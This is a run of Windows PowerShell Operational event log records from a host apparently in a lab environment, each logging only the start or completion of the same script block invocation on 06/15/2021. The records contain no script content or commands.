SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467311
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467310
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467309
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467308
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467307
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467306
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467305
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467304
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467303
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467302
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467301
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467300
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467299
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467298
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467297
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467296
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467295
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467294
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467293
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467292
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467291
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467290
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467289
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467288
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467287
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467286
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467285
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467284
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467283
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467282
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467281
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467280
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467279
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467278
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467277
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467276
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467275
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467274
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467273
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467272
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467271
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467270
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467269
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467268
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467267
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467266
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467265
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467264
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467263
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467262
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467261
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467260
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467259
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467258
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467257
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467256
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
